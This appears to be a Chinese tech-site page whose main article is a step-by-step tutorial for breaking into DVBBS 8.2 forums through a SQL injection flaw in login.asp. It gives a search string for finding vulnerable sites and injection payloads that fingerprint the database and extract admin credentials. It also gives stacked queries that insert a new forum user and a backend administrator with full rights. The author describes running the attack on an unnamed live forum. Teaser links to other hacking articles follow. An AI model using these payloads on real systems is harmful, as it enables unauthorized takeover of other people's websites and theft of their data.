dvbbs8.2漏洞代码 怎么通过动网漏洞拿下后台?
dvbbs8.2漏洞补下载地址:http://bbs.dvbbs.net/dispbbs.asp?boardid=8&;Id=1519564 紧急安全补丁0530
dvbbs8.2漏洞的产生login.asp 这个文件的97行Function Dvbbs_ChkLogin
开始有以下代码:username=trim(Dvbbs.CheckStr(request("username")))而passport和username是用户输入的。Public Function Checkstr(Str)
If Isnull(Str) Then
CheckStr = ""
Exit Function
End If
Str = Replace(Str,Chr(0),"")
CheckStr = Replace(Str,"'","''")
End Function动网用Checkstr进行处理。当我们输入111',request("username")是111'Dvbbs.CheckStr(request("passport"))以后还是111'
If ajaxPro Then username = unescape(username)username就变成了111'所以,【'】符号并没有过滤掉,漏洞就产生了。
搜索:Powered By Dvbbs Version 8.2.0 有很多用存在这样漏洞的BBS
对于新手,分析过程比较复杂,特别是语句的组合,看了我的这个教程,基本上在一分钟之内就可以搞定.
admin' and '1'='1 用户名或者密码不正确.
admin' and '1'='2 本论坛不存在该用户名.
判断数据库类型:
;and (select count(*) from sysobjects)>0
;and (select count(*) from msysobjects)>0admin' and 1=(select count(*) from dv_admin where left(username,1)='a') and '1'='1admin' and 1=(select count(*) from dv_admin where left(password,1)='a') and '1'='1' and (select @@version)>0--' and (select is_srvrolemember('sysadmin'))>0--
' and (select IS_MEMBER('db_owner'))>0--49ba59abbe56e057=123456
';update dv_user set password='49ba59abbe56e057' where username='sishui'--';update dv_user set usergroupid=1 where username='sishui'--bugtest';insert into dv_user (username,userpassword,usergroupid) values('sishui','49ba59abbe56e057','1')--bugtest';insert into dv_admin (username,password,flag,adduser) values('sishui','49ba59abbe56e057','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45','sishui')--
为了省时间我就直接先找了个论坛测试,大家看操作就好,我们来到登陆页面,这句话的意思就是在这个论坛里加入一个管理拥护,我拥护名为sishui密码为123456密码是加密的,我们来看看下面的密码随便输入,这个意思就是代表成功了,我们来登陆看看,看见了吧,呵呵,我们在来进后台不成功,为什么呢,应为刚刚我加入的是论坛管理,没有提到后台管理,下面我们在来用代码,提到后台管理权限,我们来看代码意思就是把他的权限全部提升到45,我们来试试,好了,我们在登陆看,我们进来了,呵呵,。好了就这样,教程结束
rar密码破解实例 怎么破解一个使用rar加密的文件?
对于一些安全意识比较强的人来说,一般都会对文件进行加密,例如使用rar自带的加密功能进行加密,如果偶然获取了这种rar加密文件,人的好奇心肯定会促使获取资料的人去打开这些加密文件。当然网上也有很多提供资
详情2018-01-14 15:01:36责编:llp 来源:驱动管家怎么防范采用淘宝旺旺图标的淘宝后门程序?
淘宝,一个充满互联网的名字,可以让你足不出户就可以在家买到想买的东西,特别受到年轻人和在校学生青睐。可是淘宝的使用必定牵涉到网银的使用,很多用户都会提出,使用网银,我们安全吗?如何去辨别有害程序,
详情2018-02-03 19:29:44责编:llp 来源:驱动管家永恒之蓝补丁是防范wannacry蠕虫勒索病毒的一种方法
背景5月12日晚,一款名为Wannacry的蠕虫勒索软件袭击全球网络,这被认为是迄今为止最巨大的勒索交费活动,影响到近百个国家上千家企业及公共组织。该软件被认为是一种蠕虫变种(也被称为“wannacryptor”或“wcry
详情2018-01-21 21:36:06责编:llp 来源:驱动管家为大家介绍几个增强linux网络安全工具
常用的Linux网络安全工具简介 尽管各种版本的Linux distribution 附带了很多开放源代码的自由软件,但是仍然有大量的有用 的工具没有被默认包括在它们的安装光盘内,特别是有一些可以增强Linux网络安全的工具
详情2018-01-19 10:20:01责编:llp 来源:驱动管家玩传世游戏时木马盗号 木马盗号怎么预防?
玩传世已经有一段时间了,以前对木马盗号之类的事情总是听的很多,但是从来没有碰到过,自从玩了传世开始,让小弟我着实领教了一次什么叫木马盗号,那个厉害阿。以至于现在上网都怕怕,怕中招。好废话不说,来分析一下木
详情2018-01-10 17:54:09责编:llp 来源:驱动管家虚拟桌面是什么?传统桌面和虚拟桌面的区别
桌面就是您在屏幕上看到的所有内容。通常来讲,Windows只有一个桌面,如果你打开非常多的窗口,桌面就会显得纵横交错,杂乱无章,所以你需要更多的桌面。 试想一下,您在你的电脑上接上许多的显示器,这样您或许
详情2018-01-23 20:05:48责编:llp 来源:驱动管家灰鸽子使用教程 破解灰鸽子成为注册会员
一、给灰鸽子脱壳要想得到灰鸽子的全部功能并挖出他的漏洞,就要给他脱壳。用ASPackdie给他脱壳(因为它是用ASPack加的壳),这个软件很好找,一些黑客网站上都有。先运行ASPackdie找到灰鸽子的主文件H_Client exe,
详情2018-01-17 10:25:13责编:llp 来源:驱动管家怎么利用ldap服务器攻击网站?ldap服务器攻击的威力
大家都知道前不久出现的DDoS攻击“Mirai”,导致美国半数的互联网瘫痪,是不是很厉害啊,现在下面就为大家介绍一个最新的DDoS攻击,要让DDoS攻击力更彪悍。LDAP据Corero网络安全公司披露,上周发现一种新型DDoS攻
详情2018-01-03 18:56:56责编:llp 来源:驱动管家dos命令可以破解nt账号密码?dos命令怎么破解nt账号密码?
如知道一个NT帐户与密码,就可以用net use 主机 ipc$Content$nbsp; "密码 " user: "用户 "与远程主机建立连接,这是每一个黑客或是梦想成为又或是正在努力成为黑客的朋友都知道的方法,甚至连我这个连菜鸟都算
详情2018-02-07 09:32:41责编:llp 来源:驱动管家网站在线客服插件安装要注意哪些事项?
网站建设留下联系方式是必不可少的,网站建设的注意目的也是能够与意向客户建立联系,从而进一步发展为最终客户。那么网站建设常见的联系方式有哪些呢?具济南网站建设了解总结,网站建设常用的联系方式有联系电
详情2018-01-20 08:56:15责编:llp 来源:驱动管家
- 怎么利用excel表格进行求和操作?excel表格求和怎么做?
- 小程序二维码是怎么设置的?小程序二维码设置方法
- 买数码摄像机推荐什么牌子最好?数码摄像机推荐
- 微型红外摄像机是怎样进行摄像的?微型红外摄像机工作原理
- wps页面设置技巧分享:wps文字怎么设置页面
- 在电脑上如何设置输入法全局切换的功能
- oppo r5恢复出厂设置教程 恢复oppo r5出厂设置很简单
- galaxy s4来电黑名单如何设置?galaxy s4设置来电黑名单
- 资源管理器怎么打开?资源管理器打开方法?
- ddos防范教程 ddoS攻击的应对方法
- 手机搜狗输入法可以输入表情吗?手机搜狗输入法表情在哪儿?
- 联图二维码是什么软件?联图二维码是怎么批量扫描的?
- ip摄像机怎么样?ip摄像机的具体介绍
- 摄像机电池的正确使用方法是什么?摄像机电池怎么维护
- shs文件怎么打开?教你在win7电脑上这样打开shs文件
- mac系统和windows系统局域网设置共享文件夹并互相访问的方法
- 电脑的麦克风没有声音是什么情况?怎么设置才能正常
- 主打自拍的vivo y67有什么亮点?vivo y67基础硬件怎样?
- 三星s6价格 国行版三星s6各版本多少钱?
- wpa2无线网络密码破解的方法是什么?wpa2无线网络破解步骤